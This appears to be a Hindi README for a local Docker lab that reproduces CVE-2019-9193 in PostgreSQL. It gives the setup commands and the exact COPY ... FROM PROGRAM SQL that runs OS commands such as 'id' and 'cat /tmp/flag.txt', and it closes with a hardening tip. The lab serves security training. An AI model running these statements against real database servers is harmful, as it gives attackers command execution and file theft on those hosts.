
यह लैब CVE-2019-9193 - PostgreSQL COPY FROM PROGRAM RCE का अनुकरण करता है
यह लैब CVE-2019-9193 का अनुकरण करती है, जो PostgreSQL 9.3–11.2 में एक कमजोरी है, जो अनुमति देती है:
COPY ... FROM PROGRAM '<command>'
जब सुपरयूज़र या pg_execute_server_program रोल वाला उपयोगकर्ता इसे चलाता है तो OS कमांड निष्पादित करने की अनुमति मिलती है।
आपका कार्य इस सुविधा का शोषण करके निम्न फ़ाइल को पढ़ना है:
/tmp/flag.txt
COPY FROM PROGRAM का उपयोग करें:
docker compose build
docker compose up -d
इसके माध्यम से कनेक्ट करें:
psql -U postgres -h 127.0.0.1 -p 5433
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
TRUNCATE cmd_exec;
COPY cmd_exec FROM PROGRAM 'cat /tmp/flag.txt';
SELECT * FROM cmd_exec;
pg_execute_server_program प्रदान न करें